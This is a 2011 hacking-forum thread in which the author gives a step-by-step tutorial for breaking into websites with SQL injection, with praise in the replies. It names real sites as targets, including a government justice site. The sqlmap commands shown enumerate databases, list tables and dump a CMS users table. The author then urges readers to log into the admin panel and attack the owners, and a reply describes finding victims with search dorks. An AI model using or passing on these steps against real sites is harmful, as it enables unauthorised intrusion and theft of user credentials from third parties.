![]() |
|
[SQL]how to hack almost every site with sqlmap - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Tutorials (https://sinister.li/Forum-Tutorials) +--- Thread: [SQL]how to hack almost every site with sqlmap (/Thread-SQL-how-to-hack-almost-every-site-with-sqlmap) |
[SQL]how to hack almost every site with sqlmap - KaiT_AleX - 07-24-2011 Hello, today i am gonna show you how to hack almost every site vuln on SQL... Start - - - - - - - - - - First of all you must to find some vuln sites... Our target is : http://www.zwcad.org/ vuln : http://www.zwcad.org/download_form.php?id=107 to se if it is vuln try to add ' on url, like this : http://www.zwcad.org/download_form.php?id=107' - - - - - - - - - - - - - - - - - - - - - - - - - - now when we have some vuln sites we can open a sqlmap... Start>Backtrack>Exploitation Tools>Web Exploitation Tools>sqlmap This is on a BackTrack 5... - - - - - - - - - - - - - - - - - - - - - - - - - - - - Now we must type some commands.. python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 --dbs It looks like this : ![]() when we hit the ENTER the scan is started and when scan is over we will get database's, it looks like this : ![]() Then we must put another commands to start searching a tables.. that command is : python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB --tables When you hit the enter the tables seraching is started and when it's over we get this info : ![]() Now we must type a third command for searching columns, but dirst we must to chose a one table to get columns. I chose a cms_users table.. python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB -T cms_users --dump And you will get this : ![]() You can to this too : Step by step.. To type a command for coloumns : python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB -T cms_users -C herethecolumnname --dump With this command we will get a info about one column.. Like this : ![]() Ypu always can find your files fump in : /pentest/web/scanners/sqlmap/output/ Now when we get the all info, we only must to find a admin panel and to log in and FUCK THEM !!! ![]() If you like this tutorial give me +1 rep ! Sorry about my bad English, if i make some mistakes ! ![]() Happy hacking ! ![]() ################################################# ####################~Tut by KaiT_AleX~################ ################################################## RE: [SQL]how to hack almost every site with sqlmap - djkicka55 - 07-25-2011 thanks dude learning heaps RE: [SQL]how to hack almost every site with sqlmap - KaiT_AleX - 07-25-2011 U r WelComE.. Give rep+1 !
RE: [SQL]how to hack almost every site with sqlmap - bspro - 07-25-2011 Wow dude thanks I like this omg I learn a new thing from u thanks RE: [SQL]how to hack almost every site with sqlmap - KaiT_AleX - 07-25-2011 U r welome too... I like to help others ! RE: [SQL]how to hack almost every site with sqlmap - bspro - 07-25-2011 Me too but I got black hat skills lol I will try o keep white hat here RE: [SQL]how to hack almost every site with sqlmap - KaiT_AleX - 08-02-2011 (08-02-2011, 02:17 PM)tekasapaaku Wrote: thanks KaiT_AleX No? RE: [SQL]how to hack almost every site with sqlmap - KaiT_AleX - 08-04-2011 Man you must find vuln place on the site.. First you must find the site.. You have google dorks for it... After you find site just type string on url and if you got some error that means that site is vuln on sql.. Now you have a vuln site just do every thing what i do with sqlmap... Try to learn SQL and you wont need anny program just your brain... See ya..
RE: [SQL]how to hack almost every site with sqlmap - JuiceKing - 08-04-2011 Very nice tut bro! +1 rep ! :thumbs:
RE: [SQL]how to hack almost every site with sqlmap - KaiT_AleX - 08-04-2011 Tnx man !! .. I will post more..... D
|